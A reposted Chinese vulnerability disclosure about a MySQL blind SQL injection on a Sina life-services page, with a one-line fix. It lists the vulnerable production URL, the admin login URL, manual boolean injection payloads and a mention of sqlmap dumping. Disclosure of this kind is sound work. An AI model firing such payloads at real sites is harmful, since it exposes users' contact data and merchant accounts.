Game2.tw遊戲社區

Android,iphone,ipad機遊戲攻略,收集軟體分享網站 mobile.game2.tw

新浪生活服務互動社區Mysql盲註漏洞的介紹及其修復方法(圖解)

點評:Mysql盲註漏洞,做網站的要關註哦

註入漏洞存在地址為
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中該漏洞可以導致數據泄漏,其中泄漏的數據包括團購,優惠券、以及用戶聯系方式,smslog,團購商戶、admin等數據。
 
同時,團購的商戶登陸地址為
http://life.sina.com.cn/tuanadmin
 
漏洞證明:下面為手工猜解數據庫名的語句為
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下圖為註入是返回對正確與錯誤的截圖
 
 
 
註入返回對的情況截圖
 
 
 
註入時返回錯的情況截圖
 
一下是使用sqlmap對註入點進行註入攻擊,一下該例為查詢數據庫banner,通過改變命令參數可以對其進行更深入的攻擊。
 

 
修復方案:

對其uid參數進行檢查並且進行過濾。
 
作者 Insight-labs

Leave a Reply

Your email address will not be published. Required fields are marked *